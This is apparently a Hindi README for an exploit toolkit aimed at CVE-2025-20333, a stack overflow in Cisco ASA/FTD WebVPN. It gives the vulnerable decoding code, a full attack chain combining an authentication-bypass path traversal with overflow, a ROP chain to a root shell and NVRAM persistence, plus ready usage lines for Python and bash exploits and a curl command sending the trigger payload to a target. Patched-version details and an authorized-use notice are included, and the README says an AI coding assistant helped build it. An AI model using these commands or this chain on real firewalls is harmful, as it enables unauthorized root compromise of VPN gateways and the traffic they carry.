
CVE-2025-20333 के लिए संपूर्ण शोध और शोषण टूलकिट, जो Cisco ASA/FTD WebVPN में एक गंभीर स्टैक बफर ओवरफ्लो है। इसमें विस्तृत बाइनरी विश्लेषण, Python और bash में PoC एक्सप्लॉइट, और शोषण मार्गदर्शिका शामिल है।
इस निर्देशिका में CVE-2025-20333 के लिए व्यापक अनुसंधान, विश्लेषण और प्रूफ-ऑफ-कॉन्सेप्ट कोड शामिल है, जो Cisco ASA/FTD WebVPN सर्वरों में एक गंभीर स्टैक बफर ओवरफ्लो भेद्यता है।
स्थिति: ⚠️ जंगल में सक्रिय रूप से शोषित (ArcaneDoor अभियान)
CVSS स्कोर: 9.8 गंभीर
प्रमाणीकरण: नहीं (CVE-2025-20362 के माध्यम से बायपास)
प्रभाव: रूट के रूप में रिमोट कोड निष्पादन
CVE-2025-20333-RESEARCH-NOTES.md (20 KB)संपूर्ण रिवर्स इंजीनियरिंग अनुसंधान
मुख्य निष्कर्ष:
body_lexer.re2c में फिक्स्ड 16-बाइट बफर (local_58[16])
URL-डिकोडिंग लूप में कोई बाउंड्स चेक नहीं है
iVar11 < 16 की जाँच किए बिना local_58[iVar11] में लिखना
8 हेक्स जोड़े के बाद: ओवरफ्लो → स्टैक भ्रष्टाचार → RCE
EXPLOITATION-GUIDE.md (12 KB)व्यावहारिक शोषण मैनुअल
cve-2025-20333-poc.py (15 KB)पूर्ण-विशेषताओं वाला Python एक्सप्लॉइट
विशेषताएँ:
उपयोग:
# भेद्यता विवरण दिखाएँ
python3 cve-2025-20333-poc.py --details
# लक्ष्य का शोषण करें
python3 cve-2025-20333-poc.py 192.168.1.100 443
# कस्टम सेटिंग्स
python3 cve-2025-20333-poc.py firewall.example.com 8443 -t 30
cve-2025-20333-poc.sh (8.5 KB)हल्का bash एक्सप्लॉइट
विशेषताएँ:
उपयोग:
# विवरण दिखाएँ
./cve-2025-20333-poc.sh --details
# शोषण
./cve-2025-20333-poc.sh 192.168.1.100 443 10
# curl के साथ मैनुअल
curl -X POST https://target/+CSCOU+/../+CSCOE+/files/file_list.json \
-d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" --insecure
| गुण | मान |
|---|---|
| CVE ID | CVE-2025-20333 |
| प्रकार | स्टैक बफर ओवरफ्लो (CWE-120) |
| घटक | body_lexer.re2c (FUN_0302e690) |
| प्रभावित संस्करण | ASA 9.16–9.23, FTD 7.0–7.7 |
| CVSS v3.1 | 9.8 (गंभीर) |
| प्रमाणीकरण | आवश्यक नहीं (CVE-2025-20362 के माध्यम से) |
| उपयोगकर्ता सहभागिता | कोई नहीं |
| प्रभाव | रूट के रूप में RCE, पूर्ण सिस्टम समझौता |
| स्थिति | सक्रिय रूप से शोषित (मई 2025+) |
| जिम्मेदार प्रकटीकरण | Cisco ने पैच किया; सलाह प्रकाशित |
// body_lexer.re2c - URL-डिकोडिंग लूप
byte local_58[16]; // ← फिक्स्ड 16-बाइट बफर
while (parsing_request_body) {
byte input = *data++;
if (input == '%') {
hex_decode_mode = true;
hex_index = 0;
}
if (hex_decode_mode) {
local_58[hex_index] = input; // ← कोई बाउंड्स चेक नहीं!
hex_index++;
if (hex_index == 2) {
byte decoded = hex_pair_to_byte(local_58[0], local_58[1]);
hex_decode_mode = false;
}
}
}
ओवरफ्लो ट्रिगर: POST बॉडी में 9+ लगातार %XX अनुक्रम
1. हमलावर (कोई प्रमाणीकरण आवश्यक नहीं)
↓
2. HTTP POST to /+CSCOU+/../+CSCOE+/files/file_list.json
├─ CVE-2025-20362: पाथ ट्रैवर्सल प्रमाणीकरण जाँच को बायपास करता है
└─ files_retr.lua एंडपॉइंट तक पहुँचता है (auth_flag = 0)
↓
3. POST बॉडी: name=%2f%2f%2f%2f%2f%2f%2f%2f%2f
(9+ URL-एन्कोडेड जोड़े)
↓
4. body_lexer.re2c POST बॉडी को संसाधित करता है
├─ हेक्स जोड़े को local_58[16] में जमा करता है
└─ 8 जोड़े के बाद: ओवरफ्लो!
↓
5. स्टैक भ्रष्टाचार
├─ local_48, local_40 को अधिलेखित करता है
├─ सहेजे गए RBP को अधिलेखित करता है
└─ सहेजे गए RIP (रिटर्न पता) को अधिलेखित करता है
↓
6. नियंत्रण प्रवाह अपहरण
├─ RIP ROP गैजेट्स की ओर इशारा करता है
├─ ROP श्रृंखला execve() सेट करती है
└─ execve("/bin/sh", NULL, NULL)
↓
7. रूट के रूप में RCE (lina प्रक्रिया रूट के रूप में चलती है)
├─ पूर्ण VPN सर्वर समझौता
├─ सभी VPN ट्रैफ़िक तक पहुँच
└─ NVRAM संशोधन के माध्यम से स्थिरता
lina बाइनरी खोला/+CSCOU+/../+CSCOE+/files/file_list.json का उपयोग करती है, इसकी पुष्टि कीlocal_58[16]प्राधिकरण सत्यापित करें
एक्सप्लॉइट चलाएँ
# त्वरित जाँच: क्या लक्ष्य शोषण प्रयास का जवाब देता है?
python3 cve-2025-20333-poc.py <target_ip>
# या bash संस्करण:
./cve-2025-20333-poc.sh <target_ip>
शोषण सत्यापित करें
निष्कर्ष दस्तावेज़ित करें
अनुसंधान नोट्स पढ़ें
CVE-2025-20333-RESEARCH-NOTES.md का अध्ययन करेंPoCs का अध्ययन करें
अनुकूलित करें और विस्तारित करें
⚠️ कानूनी सूचना
यह टूलकिट केवल अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।
✅ अधिकृत उपयोग:
❌ निषिद्ध उपयोग:
cve-2025-20333/
├── README.md (यह फ़ाइल)
├── CVE-2025-20333-RESEARCH-NOTES.md (20 KB, व्यापक अनुसंधान)
├── EXPLOITATION-GUIDE.md (12 KB, व्यावहारिक मार्गदर्शिका)
├── cve-2025-20333-poc.py (15 KB, Python PoC)
└── cve-2025-20333-poc.sh (8.5 KB, bash PoC)
कुल दस्तावेज़ीकरण: ~65 KB
अनुसंधान गहराई: 50+ Ghidra फ़ंक्शन ऑडिट किए गए
सत्यापित निष्कर्ष: body_lexer.re2c में बफर ओवरफ्लो की पुष्टि हुई
# परीक्षण करें कि क्या लक्ष्य शोषण के लिए कमजोर है
curl -X POST https://<target>/+CSCOU+/../+CSCOE+/files/file_list.json \
-d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" \
--insecure \
-i
# यदि लक्ष्य जवाब देता है (200, 500, क्रैश), यह कमजोर हो सकता है
# यदि लक्ष्य ब्लॉक/रीडायरेक्ट करता है, यह पैच किया जा सकता है
# कमजोर संस्करण:
# - Cisco ASA 9.16 से 9.23
# - Cisco FTD 7.0 से 7.7
# ASA संस्करण जाँचने के लिए SSH/कंसोल का उपयोग करें:
show version
# पैच किए गए संस्करण:
# - ASA 9.16.4.51, 9.18.4.31, 9.20.4.49, 9.22.4.9, 9.24.1+
# - FTD 7.0.x, 7.1.x, 7.2.x (पैच किए गए)
यह टूलकिट केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए AS-IS प्रदान किया गया है।
इस परियोजना को Claude Code, Anthropic के AI-संचालित कोडिंग सहायक की सहायता से विकसित किया गया था।
निर्मित: 2026-08-23
अनुसंधान अवधि: 2026-08-22 से 2026-08-23
स्थिति: पूर्ण और दस्तावेज़ित
वर्गीकरण: शैक्षिक / केवल अधिकृत परीक्षण